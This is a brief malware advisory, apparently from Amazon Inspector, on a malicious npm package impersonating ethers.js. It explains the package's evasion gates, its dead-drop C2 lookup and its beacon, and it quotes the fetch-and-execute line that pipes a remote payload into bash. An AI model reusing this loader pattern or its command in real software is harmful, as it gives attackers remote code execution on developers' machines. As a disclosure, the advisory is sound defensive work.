@403name/ether-js @1.0.1

Summary

On require('@403name/ether-js'), index.js runs an IIFE that targets macOS only (returns early on non-darwin and when CI/GITHUB_ACTIONS env vars are set), writes a one-shot marker at ~/.cache/.nyx-npm/e, waits a randomized 30-90s, then fetches a C2 base URL from https://raw.githubusercontent.com/nyx-deploy/config/main/c2.txt. It beacons the installer's USER env var and os.hostname() to <c2>/api/clickfix-callback via curl, then spawns '/bin/sh -c' with curl -sSfL <c2>/api/payload/ | /bin/bash (detached, disowned) — full remote code execution on the developer's machine under attacker control. A Russian-language comment in the source explicitly states the design avoids lifecycle scripts to be 'invisible to npm audit'. The package name and description impersonate the popular ethers.js library ('Compatible with ethers.js API patterns for easy migration'), and the shipped keccak256 is a stub returning random hex rather than a real hash — confirming the package is a lure, not a functional library. The evasion pattern (platform gate, CI gate, randomized delay, one-shot marker) combined with the two-stage dead-drop-to-C2 fetch-and-exec is conclusive malicious intent.

Source: amazon-inspector (927758f43d6eaa6514273bd8ab8f3559624055b9bbf8c9ef9a190b645c0a6eef)